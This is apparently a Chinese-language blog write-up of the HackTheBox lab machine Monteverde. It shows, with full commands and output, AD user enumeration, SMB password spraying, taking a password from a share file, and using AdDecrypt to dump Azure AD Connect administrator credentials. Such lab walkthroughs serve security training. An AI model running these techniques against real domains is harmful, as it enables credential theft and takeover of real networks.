起手式nmap偵查,53、88、135、139、389、445、464、593、636、3268、3269都有開,看來大概是Domain Controller。

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.172
------------------------------------------------------------
Scanning target 10.10.10.172
Time started: 2024-02-01 06:34:00.337693
------------------------------------------------------------
Port 53 is open
Port 139 is open
Port 135 is open
Port 88 is open
Port 389 is open
Port 445 is open
Port 464 is open
Port 593 is open
Port 636 is open
Port 3268 is open
Port 3269 is open
Port 5985 is open
Port 9389 is open
Port 49667 is open
Port 49674 is open
Port 49673 is open
Port 49675 is open
Port 49737 is open
Port scan completed in 0:01:38.771209
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p53,139,135,88,389,445,464,593,636,3268,3269,5985,9389,49667,49674,49673,49675,49737 -sV -sC -T4 -Pn -oA 10.10.10.172 10.10.10.172
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p53,139,135,88,389,445,464,593,636,3268,3269,5985,9389,49667,49674,49673,49675,49737 -sV -sC -T4 -Pn -oA 10.10.10.172 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-01 06:35 EST
Nmap scan report for 10.10.10.172
Host is up (0.26s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-01 11:35:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-01T11:36:44
|_  start_date: N/A
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.98 seconds
------------------------------------------------------------
Combined scan completed in 0:03:31.063994
Press enter to quit...

把掃到的domain name給加進hosts裡:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ sudo -i                
[sudo] password for kali: 
┌──(root㉿kali)-[~]
└─# echo "10.10.10.172 megabank.local">> /etc/hosts

┌──(root㉿kali)-[~]
└─# exit

因為有445 port且是DC,enum4linux-ng 10.10.10.172 -oJ out,會出現out.json:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ ls    
10.10.10.172  out.json

把out.json用網頁看,可以看到一些帳號:

把這些帳號給編入users.txt

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ vim users.txt                     

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ cat users.txt   
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

The ldapsearch worked and A LOT of information was dumped. So much information that I had to redirect the output to a file for easier parsing.ldapsearch和使用enum4linux一樣的效果,但感覺比較好。

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b "dc=megabank,dc=local" > ldapsearch.txt

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ cat ldapsearch.txt | grep  'userPrincipalName'
userPrincipalName: mhope@MEGABANK.LOCAL
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
userPrincipalName: svc-ata@MEGABANK.LOCAL
userPrincipalName: svc-bexec@MEGABANK.LOCAL
userPrincipalName: svc-netapp@MEGABANK.LOCAL
userPrincipalName: dgalanos@MEGABANK.LOCAL
userPrincipalName: roleary@MEGABANK.LOCAL
userPrincipalName: smorgan@MEGABANK.LOCAL

試試zone transfer跟AS-REP攻擊,但沒用:

dig @10.10.10.172 AXFR megabank.local

GetNPUsers.py megabank.local/ -dc-ip 10.10.10.172

Kerberoasting也沒用,沒人開不用預認證,試試有沒有可以匿名登入的共享目錄(smbclient)或是可以rid枚舉,但看來都不行。

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ smbclient -L 10.10.10.172 -N
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ rpcclient 10.10.10.172 -N
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

既然常見手段都不行,只好試試暴力破解每個帳號的smb登入密碼了。安裝legba來爆破密碼(安裝失敗)。

先使用cat ./users.txt > wordlist.txt | cat /usr/share/seclists/Passwords/Leaked-Databases/rockyou-25.txt >> wordlist.txt來創建密碼檔。把帳號名稱也鍵入字典檔,因為有人會把密碼設成跟帳號一樣;rockyou-25是比較小的字典檔,先用比較小的字典檔去測,如果都沒猜中再用比較大的字典檔。

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ /home/kali/Spray/spray.sh -smb 10.10.10.172 users.txt wordlist.txt 700 35 megabank.local

Spray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)

21:33:39 Spraying with password: Users Username
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[*] user Guest%Guest [*] user AAD_987d7f2f57d2%AAD_987d7f2f57d2 [*] user mhope%mhope [*] user SABatchJobs%SABatchJobs Account Name: SABatchJobs, Authority Name: MEGABANK
[*] user svc-ata%svc-ata [*] user svc-bexec%svc-bexec [*] user svc-netapp%svc-netapp [*] user dgalanos%dgalanos [*] user roleary%roleary [*] user smorgan%smorgan 
21:33:52 Spraying with password: Guest

user SABatchJobs%SABatchJobs Account Name: SABatchJobs, Authority Name: MEGABANK,資訊完整,代表爆破成功,SABatchJobs這個帳號用的密碼跟帳號一樣。有了帳密,再試試kerberoastable,但沒用,不過共享目錄有用:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ impacket-GetUserSPNs -request 'megabank.local/SABatchJobs:SABatchJobs' -dc-ip 10.10.10.172
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ smbclient -L 10.10.10.172 -U "megabank.local/SABatchJobs%SABatchJobs"

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    azure_uploads   Disk      
    C$              Disk      Default share
    E$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    users$          Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

there are two custom shares “azure_uploads” and “users“. Next, there are two disk drives on this host “C”, which is default, but also “E”. Finally, SYSVOL is interesting if this is a version of Windows Server that uses the Groups.xml file.

總之非預設的資料夾有“azure_uploads”跟“users“,E也不是預設的磁碟機。發現azure.xml這個檔案,下載下來:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ smbclient "\\\\10.10.10.172\\users$" -U "megabank.local/SABatchJobs"
Password for [MEGABANK.LOCAL\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

        31999 blocks of size 4096. 28979 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

\dgalanos
  .                                   D        0  Fri Jan  3 08:12:30 2020
  ..                                  D        0  Fri Jan  3 08:12:30 2020

\mhope
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

\roleary
  .                                   D        0  Fri Jan  3 08:10:30 2020
  ..                                  D        0  Fri Jan  3 08:10:30 2020

\smorgan
  .                                   D        0  Fri Jan  3 08:10:24 2020
  ..                                  D        0  Fri Jan  3 08:10:24 2020

        31999 blocks of size 4096. 28979 blocks available
smb: \> cd mhope
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)

輸入指令smbclient "\\\\10.10.10.172\\azure_uploads" -U "megabank.local/SABatchJobs"來掛載,會發現azure_uploads裡面沒有東西。所以看看剛剛下載下來的azure.xml:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ cat azure.xml                                                                                         
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

發現有密碼,但不知道是誰的,用crackmapexec爆破看看:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt  -p 4n0therD4y@n0th3r$
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$

確定是mhope的密碼後,用evil-winrm登入,看看他隸屬於哪些group。可以發現他隸屬的group有一個很特別的Azure Admins:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> net user mhope /domain
User name                    mhope
Full Name                    Mike Hope
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/2/2020 3:40:05 PM
Password expires             Never
Password changeable          1/3/2020 3:40:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory               \\monteverde\users$\mhope
Last logon                   2/2/2024 6:54:41 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Azure Admins         *Domain Users
The command completed successfully.

net localgroup來列出這電腦上的local group的名稱:

*Evil-WinRM* PS C:\Users\mhope\Documents> net localgroup

Aliases for \\MONTEVERDE

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*ADSyncAdmins
*ADSyncBrowse
*ADSyncOperators
*ADSyncPasswordSet
*Allowed RODC Password Replication Group
...

看到幾個特別的,拿去餵狗後結果如下,比較有趣的是下圖反藍:

再把所謂的AD connect拿去google看看有沒有入侵方法,果然是有,但試過下圖前面三個搜尋結果,那些腳本都要改,不然會失敗,我們試第4個(如下圖反藍):

看一下readme,注意上圖跟下圖反藍:

下載到攻擊機後解壓縮。

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ ls
AdDecrypt  AdDecrypt.exe  AdDecrypt.zip  ADSyncDecrypt.ps1  Azure-ADConnect.ps1  azure.xml  ldapsearch.txt  logs  mcrypt.dll  out.json  users.txt  wordlist.txt

把解壓縮出來的exe跟dll都上傳到靶機,並照readme說的,先移動到C:\Program Files\Microsoft Azure AD Sync\Bin,再執行AdDecrypt.exe -FullSQL:

*Evil-WinRM* PS C:\Users\mhope\Documents> upload AdDecrypt.exe

Info: Uploading /home/kali/HTB/monteverde/AdDecrypt.exe to C:\Users\mhope\Documents\AdDecrypt.exe

Data: 19796 bytes of 19796 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> upload mcrypt.dll

Info: Uploading /home/kali/HTB/monteverde/mcrypt.dll to C:\Users\mhope\Documents\mcrypt.dll

Data: 445664 bytes of 445664 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

爆出密碼後,即可使用evil-winrm登入:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ evil-winrm -i 10.10.10.172 -u 'administrator' -p 'd0m@in4dminyeah!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/2/2024   6:21 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f6449354843443fa754e61b9ccdae2bc

reference

HacktheBox – Monteverde - Juggernaut Pentesting Blog

https://medium.com/@roopesh.sg7/walk-through-htb-monteverde-43ff31542a92

GitHub - VbScrub/AdSyncDecrypt


#帳號枚舉-使用enum4linux #帳號枚舉-使用ldapsearch #密碼檔創建技巧 #smb密碼噴灑-使用spray.sh(有密碼字典檔、有帳號字典檔) #共享目錄枚舉-使用smbclient(有域名、有IP、有帳密) #smb密碼爆破-使用crackmapexec(有密碼、有帳號字典檔) #查看使用者隸屬group(windows) #查看本機local group #AD connect濫用-使用github VbScrub/AdSyncDecrypt







Related Posts

SQL-injection lab(7)

SQL-injection lab(7)

[Hardware] 讀卡機編碼格式、卡片相關資訊

[Hardware] 讀卡機編碼格式、卡片相關資訊

關於 React 小書:props children 和容器類組件

關於 React 小書:props children 和容器類組件


Comments